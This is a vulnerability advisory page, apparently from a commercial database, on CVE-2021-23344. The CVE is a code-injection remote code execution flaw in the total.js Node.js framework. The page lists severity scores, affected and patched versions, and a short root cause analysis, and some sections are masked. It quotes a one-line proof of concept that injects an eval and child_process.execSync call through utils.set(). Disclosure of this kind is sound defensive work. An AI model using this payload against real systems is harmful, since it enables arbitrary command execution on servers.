9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2021-23344

GHSA ID

GHSA-3wj8-vp9h-rm6m

EPSS Score

0.90758%

CWE

CWE-94

Published

3/19/2021

Updated

9/13/2023

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2021-23344

CVE-2021-23344:
total.js Remote Code Execution Vulnerability

total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via set.

PoC

// To be run in a nodejs console: 
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')

(GitHub Advisory)

9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2021-23344

GHSA ID

GHSA-3wj8-vp9h-rm6m

EPSS Score

0.90758%

CWE

CWE-94

Published

3/19/2021

Updated

9/13/2023

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
total.js	npm	< 3.4.7	3.4.8

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The PoC demonstrates RCE via require('total.js/utils').set()
The GitHub commit shows security improvements in utils.js's set function
The patch adds 'eval' to the regex pattern check, indicating it was previously allowed
The vulnerable code uses new Function() with unsanitized input containing semicolons to chain expressions
CWE-94 (Code Injection) directly maps to unsafe code generation in set()

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

tot*l.js is * *r*m*work *or No**.js pl*t*rom writt*n in pur* J*v*S*ript simil*r to P*P's L*r*v*l or Pyt*on's *j*n*o or *SP.N*T MV*. It **n ** us** *s w**, **sktop, s*rvi** or IoT *ppli**tion. *****t** v*rsions o* t*is p**k*** *r* vuln*r**l* to R*mot

Reasoning

*. T** Po* **monstr*t*s R** vi* r*quir*('tot*l.js/utils').s*t() *. T** *it*u* *ommit s*ows s**urity improv*m*nts in utils.js's s*t *un*tion *. T** p*t** ***s '*v*l' to t** r***x p*tt*rn ****k, in*i**tin* it w*s pr*viously *llow** *. T** vuln*r**l* *o

9.8

Basic Information

Concerned about an active attack path?

CVE-2021-23344: total.js Remote Code Execution Vulnerability

PoC

9.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2021-23344:
total.js Remote Code Execution Vulnerability

Vulnerability Intelligence
Miggo AI